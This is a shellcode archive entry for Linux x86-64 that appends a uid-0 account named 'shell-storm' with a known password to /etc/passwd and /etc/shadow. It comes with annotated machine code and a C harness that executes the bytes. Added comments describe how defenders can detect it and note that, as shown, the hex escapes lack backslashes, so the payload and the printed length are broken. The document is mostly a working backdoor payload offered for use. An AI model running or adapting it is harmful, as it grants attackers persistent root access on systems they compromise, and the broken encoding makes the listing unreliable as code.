
# Title : Linux/x86-64 - Add root user with password - 390 bytes
# Published : 2010-06-20
# Author : Jonathan Salwan
# Previous Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
# Next Title : Linux/x86-64 - Disable ASLR Security - 143 bytes


/*
Title:  Linux/x86-64 - Add root user with password - 390 bytes
Date:   2010-06-20
Tested: Archlinux x86_64 k2.6.33
 
Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm
 
! Database of shellcodes http://www.shell-storm.org/shellcode/



Add root user with password:
                             - User: shell-storm
                             - Pass: leet
                             - id  : 0
*/

#include <stdio.h>


	char *SC = 
                        /*
                         * Payload bytes written as hex escapes, each line annotated
                         * with the intended disassembly. Per the annotations below it
                         * performs, in order: open("/etc/passwd") for append, write a
                         * passwd entry, close; open("/etc/shadow") for append, write a
                         * shadow entry, close; _exit(0). The fd handed to write/close
                         * is the constant 3, not open()'s return value in %rax.
                         *
                         * Defender's view: the only durable effect is one appended line
                         * in /etc/passwd and one in /etc/shadow, so file-integrity
                         * monitoring or an audit rule on writes to those two paths, and
                         * a check for any uid-0 account other than root, will surface
                         * it. Opening /etc/shadow for writing presumably requires
                         * euid 0 -- confirm.
                         *
                         * NOTE(review): on this page the escapes read "x48..." with no
                         * backslash, so the literal as shown is plain ASCII text rather
                         * than the 390 bytes the title claims; strlen(SC) in main()
                         * will not report 390.
                         */
                        /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
			
                        "x48xbbxffxffxffxffxffx73x77x64"       /* mov    $0x647773ffffffffff,%rbx */
                        "x48xc1xebx28"                               /* shr    $0x28,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx2fx65x74x63x2fx70x61x73"       /* mov    $0x7361702f6374652f,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48x89xe7"                                   /* mov    %rsp,%rdi */
                        "x66xbex41x04"                               /* mov    $0x441,%si   (0x441 = O_WRONLY|O_CREAT|O_APPEND) */
                        "x66xbax84x02"                               /* mov    $0x284,%dx   (0x284 = 01204 octal, the mode) */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x02"                                       /* mov    $0x2,%al     (SYS_open) */
                        "x0fx05"                                       /* syscall */

                        /* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
                        /* The pushed qwords spell the passwd line; uid/gid are 0. */

                        "x48xbfxffxffxffxffxffxffxffx03"       /* mov    $0x3ffffffffffffff,%rdi */
                        "x48xc1xefx38"                               /* shr    $0x38,%rdi   (%rdi = 3, assumed fd) */
                        "x48xbbxffxffx2fx62x61x73x68x0a"       /* mov    $0xa687361622fffff,%rbx */
                        "x48xc1xebx10"                               /* shr    $0x10,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx67x3ax2fx3ax2fx62x69x6e"       /* mov    $0x6e69622f3a2f3a67,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx73x74x6fx72x6dx2ex6fx72"       /* mov    $0x726f2e6d726f7473,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx30x3ax73x68x65x6cx6cx2d"       /* mov    $0x2d6c6c6568733a30,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx6fx72x6dx3ax78x3ax30x3a"       /* mov    $0x3a303a783a6d726f,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx73x68x65x6cx6cx2dx73x74"       /* mov    $0x74732d6c6c656873,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48x89xe6"                                   /* mov    %rsp,%rsi */
                        "x48xbaxffxffxffxffxffxffxffx2e"       /* mov    $0x2effffffffffffff,%rdx */
                        "x48xc1xeax38"                               /* shr    $0x38,%rdx   (%rdx = 0x2e = 46 bytes) */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x01"                                       /* mov    $0x1,%al     (SYS_write) */
                        "x0fx05"                                       /* syscall */

                        /* close(3) */

                        "x48xbfxffxffxffxffxffxffxffx03"       /* mov    $0x3ffffffffffffff,%rdi */
                        "x48xc1xefx38"                               /* shr    $0x38,%rdi */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x03"                                       /* mov    $0x3,%al     (SYS_close) */
                        "x0fx05"                                       /* syscall */

                        /* Xor: clear the registers reused by the second open/write */

                        "x48x31xdb"                                   /* xor    %rbx,%rbx */
                        "x48x31xff"                                   /* xor    %rdi,%rdi */
                        "x48x31xf6"                                   /* xor    %rsi,%rsi */
                        "x48x31xd2"                                   /* xor    %rdx,%rdx */

                        /* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */

                        "x48xbbxffxffxffxffxffx64x6fx77"       /* mov    $0x776f64ffffffffff,%rbx */
                        "x48xc1xebx28"                               /* shr    $0x28,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx2fx65x74x63x2fx73x68x61"       /* mov    $0x6168732f6374652f,%rbx  */
                        "x53"                                           /* push   %rbx */
                        "x48x89xe7"                                   /* mov    %rsp,%rdi */
                        "x66xbex41x04"                               /* mov    $0x441,%si */
                        "x66xbax84x02"                               /* mov    $0x284,%dx */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x02"                                       /* mov    $0x2,%al */
                        "x0fx05"                                       /* syscall */ /* was left unterminated on the original page, swallowing the next annotation */

                        /* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
                        /* The pushed qwords spell the shadow line; "$1$" marks an MD5-crypt hash. */
			
                        "x48xbfxffxffxffxffxffxffxffx03"       /* mov    $0x3ffffffffffffff,%rdi */
                        "x48xc1xefx38"                               /* shr    $0x38,%rdi   (%rdi = 3, assumed fd) */
                        "x48xbbxffxffxffxffxffx3ax3ax0a"       /* mov    $0xa3a3affffffffff,%rbx */
                        "x48xc1xebx28"                               /* shr    $0x28,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx34x37x37x38x3ax3ax3ax3a"       /* mov    $0x3a3a3a3a38373734,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx5ax30x55x33x4dx2fx3ax31"       /* mov    $0x313a2f4d3355305a,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx73x2fx50x64x53x67x63x46"       /* mov    $0x4663675364502f73,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx61x78x65x4dx67x36x4cx54"       /* mov    $0x544c36674d657861,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx65x57x45x37x47x4dx31x24"       /* mov    $0x24314d4737455765,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx6fx72x6dx3ax24x31x24x72"       /* mov    $0x722431243a6d726f,%rbx  */
                        "x53"                                           /* push   %rbx */
                        "x48xbbx73x68x65x6cx6cx2dx73x74"       /* mov    $0x74732d6c6c656873,%rbx */
                        "x53"                                           /* push   %rbx */
                        "x48x89xe6"                                   /* mov    %rsp,%rsi */
                        "x48xbaxffxffxffxffxffxffxffx3b"       /* mov    $0x3bffffffffffffff,%rdx */
                        "x48xc1xeax38"                               /* shr    $0x38,%rdx   (%rdx = 0x3b = 59 bytes) */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x01"                                       /* mov    $0x1,%al */
                        "x0fx05"                                       /* syscall */

                        /* close(3) */

                        "x48xbfxffxffxffxffxffxffxffx03"       /* mov    $0x3ffffffffffffff,%rdi */
                        "x48xc1xefx38"                               /* shr    $0x38,%rdi */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x03"                                       /* mov    $0x3,%al */
                        "x0fx05"                                       /* syscall */

                        /* _exit(0) */

                        "x48x31xff"                                   /* xor    %rdi,%rdi   (status 0) */
                        "x48x31xc0"                                   /* xor    %rax,%rax */
                        "xb0x3c"                                       /* mov    $0x3c,%al    (SYS_exit) */
                        "x0fx05";                                      /* syscall */


/*
 * Test harness: prints the length of the SC literal, then transfers control
 * to it. Returns 0 only if the call ever comes back.
 */
int main(void)
{
        /* NOTE(review): strlen() returns size_t but is printed with %d, and
         * <string.h> is not included for its prototype. The trailing "n" in
         * the format looks like a newline escape that lost its backslash on
         * this page, so it prints a literal 'n' and no line break. */
        fprintf(stdout,"Length: %dn",strlen(SC));
        /* Casts the string literal to a function pointer and calls it. The
         * literal typically sits in read-only, non-executable data, so on a
         * W^X-enforcing build/OS this call faults instead of running the
         * bytes -- exactly the mitigation such harnesses have to defeat. */
        (*(void(*)()) SC)();
return 0;
}